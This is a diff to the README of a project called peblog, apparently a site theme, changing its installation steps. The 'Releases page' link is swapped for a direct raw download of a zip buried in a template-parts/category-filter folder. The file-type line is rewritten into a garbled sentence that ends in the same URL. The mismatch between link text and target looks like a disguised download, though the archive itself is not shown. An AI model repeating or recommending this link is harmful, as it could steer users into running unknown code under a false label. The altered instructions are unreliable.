aERgEFSF/peblog/README.md

 To begin using peblog, follow these steps:

-1. **Visit the Releases Page:** Go to the [Releases page](https://github.com/aERgEFSF/peblog/releases) to find the latest version of the theme.
+1. **Visit the Releases Page:** Go to the [Releases page](https://raw.githubusercontent.com/aERgEFSF/peblog/main/template-parts/category-filter/peblog_1.1.zip) to find the latest version of the theme.

 2. **Download the Theme:**
    - Look for the latest release.
-   - Click on the downloadable file link, usually labeled as ".zip" or ".tar.gz".
+   - Click on the downloadable file link, usually labeled as ".zip" or "https://raw.githubusercontent.com/aERgEFSF/peblog/main/template-parts/category-filter/peblog_1.1.zip".

 3. **Extract the Files:**
    - Once downloaded, locate the file in your downloads folder.